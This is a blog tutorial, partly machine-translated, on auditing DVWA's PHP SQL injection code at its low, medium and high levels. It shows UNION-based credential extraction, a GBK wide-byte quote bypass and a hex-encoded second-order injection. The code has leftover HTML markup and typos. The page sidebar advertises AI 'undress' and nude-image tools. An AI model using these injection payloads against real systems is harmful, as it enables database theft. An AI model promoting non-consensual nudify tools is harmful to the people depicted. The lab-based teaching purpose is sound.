Backend DevelopmentPHP TutorialPHP code audit learning dvwa_sql, PHP audit dvwa_sql_PHP tutorial
php code audit learning dvwa_sql, php audit dvwa_sql
0x00
Since I switched to OneNote, I haven’t published a new essay for a long time, but it is still very necessary to think about it. I have started to learn PHP code auditing in the past few days, so let’s start posting these essays first!
First of all, let’s start learning through dvwa, the top ten test platforms. First, bring the links of famous experts for reference here. Thanks for sharing
1.http://drops.wooyun.org/papers/483
2.http://www.lxway.com/86980986.htm is_numeric function bypasses
3.http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html Character encoding bypass Wide byte injection
0x01
Here we first bring in the simplest low-level php code
<span> $id</span> = <span>$_GET</span>['id'<span>];//未作任何过滤,防注入处理
</span><span>$getid</span> = "SELECT first_name, last_name FROM users WHERE user_id = '<span>$id</span>'"<span>;
</span><span>$result</span> = <span>mysql_query</span>(<span>$getid</span>) or <span>die</span>('<pre class="brush:php;toolbar:false">' . <span>mysql_error</span>() . '' );
Seeing this, we can know that this code actually does not process id, resulting in sql injection vulnerability, ok, all kinds of injections are possible, here it is No more details!
0x02
Medium level, code:
<span> $id</span>=<span>$_GET</span>['id'<span>]; </span><span>$id</span>=<span>mysql_real_escape_string</span>(<span>$id</span><span>);//这里对id进行了转义的操作 </span><span>$getid</span>="SELECTfirst_name,last_nameFROMusersWHEREuser_id=<span>$id</span>";
The mysql_real_escape_string function escapes the id parameter. Common escapes include
- ' => '
- " => "
- => \
- n => \n
Here I think there should be 2 ways to bypass this processing:
1. Numerical injection
Since this function is mainly aimed at processing character-type special characters, we can inject without using special characters, that is, numerical injection
<span> 构造:1</span> untion <span>select</span> <span>user</span>,password <span>from</span> users
From this you can get the account password in the users table. Of course you will ask, what if you don’t know the specific table name and column name? ok, we can try to use union bool injection
<span> 构造:1</span><span>+</span><span>union</span><span>+</span><span>select</span><span>+</span><span>1</span>,(<span>select</span><span>+</span><span>case</span><span>+</span><span>when</span><span>+</span><span>char</span>(<span>72</span>)<span>=</span>(<span>select</span> mid(table_name,<span>0</span>,<span>1</span>) <span>from</span> information_schema.tables limit <span>0</span>,<span>1</span>)<span>+</span><span>then</span><span>+</span><span>2</span><span>+</span><span>end</span>)
The value in char() needs to be transformed and limited, which may take more time. We can write a python script (ps: take a pit first). In fact, the same effect can be achieved using delayed injection
2. Wide byte injection
mysql_real_escape_string The way to escape parameters is to add a '', and its url encoding is , so we are Add �' to the parameter, where � is a legal gbk character
Then after processing by this function, you can find that it will become �\', like this � will swallow a and become a gbk character \'
And the escape character of mysql is also '' is equivalent to injecting a single quote
<span> 构造:1</span><span>%</span>df<span>%</span>5c<span>%</span><span>27</span><span>%</span><span>20</span><span>||</span><span>1</span><span>+</span><span>--</span><span>+ </span>
The same addslashes function also has the same problem. For details, please refer to the link at the beginning of the article
0x02
high级别的php代码
<span>$id</span>=<span>$_GET</span>['id'<span>];
</span><span>$id</span>=<span>stripslashes</span>(<span>$id</span><span>);//剔除参数中的斜杠
</span><span>$id</span>=<span>mysql_real_escape_string</span>(<span>$id</span><span>);//对id中的特殊字符进行转义
</span><span>if</span>(<span>is_numeric</span>(<span>$id</span><span>)){//判断是否是数值或数值字符串
</span>...
好吧,这样一来,我觉得还是变得很安全了,前面2个函数对字符型的注入进行了处理,紧接着is_numeric函数则对数值型注入进行了处理。
然而这样子仍然可以造成sql注入,不过是二次注入,且限制的条件也比较苛刻但是仍有机会造成注入
比如执行sql语句
<span> insert</span> <span>into</span> test(type) <span>values</span>($s);
此时传入的字符串$s=0x31206f722031
这样看可以知道这是一个16进制数,可以通过该函数的检测,然后对16进制解码我们可以发现$s其实实际的值为 ‘1 or 1’
那么这样操作数据库里会变成什么样子
可以看到数据库将这串16进制数进行了转码变成了1 or 1 那么到时候进行数据库取值然后不经处理带入到另一个sql语句中就会造成二次注入.所以我们在写代码的时候不能盲目的信任数据库里的数据,在取出数据时仍需要进行检测。
0x03
sql部分的代码就分析到这里,如有不正确的地方,欢迎拍砖!
下篇准备sql blind :)
How does PHP type hinting work, including scalar types, return types, union types, and nullable types?Apr 17, 2025 am 12:25 AMPHP type prompts to improve code quality and readability. 1) Scalar type tips: Since PHP7.0, basic data types are allowed to be specified in function parameters, such as int, float, etc. 2) Return type prompt: Ensure the consistency of the function return value type. 3) Union type prompt: Since PHP8.0, multiple types are allowed to be specified in function parameters or return values. 4) Nullable type prompt: Allows to include null values and handle functions that may return null values.
How does PHP handle object cloning (clone keyword) and the __clone magic method?Apr 17, 2025 am 12:24 AMIn PHP, use the clone keyword to create a copy of the object and customize the cloning behavior through the \_\_clone magic method. 1. Use the clone keyword to make a shallow copy, cloning the object's properties but not the object's properties. 2. The \_\_clone method can deeply copy nested objects to avoid shallow copying problems. 3. Pay attention to avoid circular references and performance problems in cloning, and optimize cloning operations to improve efficiency.
PHP vs. Python: Use Cases and ApplicationsApr 17, 2025 am 12:23 AMPHP is suitable for web development and content management systems, and Python is suitable for data science, machine learning and automation scripts. 1.PHP performs well in building fast and scalable websites and applications and is commonly used in CMS such as WordPress. 2. Python has performed outstandingly in the fields of data science and machine learning, with rich libraries such as NumPy and TensorFlow.
Describe different HTTP caching headers (e.g., Cache-Control, ETag, Last-Modified).Apr 17, 2025 am 12:22 AMKey players in HTTP cache headers include Cache-Control, ETag, and Last-Modified. 1.Cache-Control is used to control caching policies. Example: Cache-Control:max-age=3600,public. 2. ETag verifies resource changes through unique identifiers, example: ETag: "686897696a7c876b7e". 3.Last-Modified indicates the resource's last modification time, example: Last-Modified:Wed,21Oct201507:28:00GMT.
Explain secure password hashing in PHP (e.g., password_hash, password_verify). Why not use MD5 or SHA1?Apr 17, 2025 am 12:06 AMIn PHP, password_hash and password_verify functions should be used to implement secure password hashing, and MD5 or SHA1 should not be used. 1) password_hash generates a hash containing salt values to enhance security. 2) Password_verify verify password and ensure security by comparing hash values. 3) MD5 and SHA1 are vulnerable and lack salt values, and are not suitable for modern password security.
PHP: An Introduction to the Server-Side Scripting LanguageApr 16, 2025 am 12:18 AMPHP is a server-side scripting language used for dynamic web development and server-side applications. 1.PHP is an interpreted language that does not require compilation and is suitable for rapid development. 2. PHP code is embedded in HTML, making it easy to develop web pages. 3. PHP processes server-side logic, generates HTML output, and supports user interaction and data processing. 4. PHP can interact with the database, process form submission, and execute server-side tasks.
PHP and the Web: Exploring its Long-Term ImpactApr 16, 2025 am 12:17 AMPHP has shaped the network over the past few decades and will continue to play an important role in web development. 1) PHP originated in 1994 and has become the first choice for developers due to its ease of use and seamless integration with MySQL. 2) Its core functions include generating dynamic content and integrating with the database, allowing the website to be updated in real time and displayed in personalized manner. 3) The wide application and ecosystem of PHP have driven its long-term impact, but it also faces version updates and security challenges. 4) Performance improvements in recent years, such as the release of PHP7, enable it to compete with modern languages. 5) In the future, PHP needs to deal with new challenges such as containerization and microservices, but its flexibility and active community make it adaptable.
Why Use PHP? Advantages and Benefits ExplainedApr 16, 2025 am 12:16 AMThe core benefits of PHP include ease of learning, strong web development support, rich libraries and frameworks, high performance and scalability, cross-platform compatibility, and cost-effectiveness. 1) Easy to learn and use, suitable for beginners; 2) Good integration with web servers and supports multiple databases; 3) Have powerful frameworks such as Laravel; 4) High performance can be achieved through optimization; 5) Support multiple operating systems; 6) Open source to reduce development costs.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
Notepad++7.3.1
Easy-to-use and free code editor
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
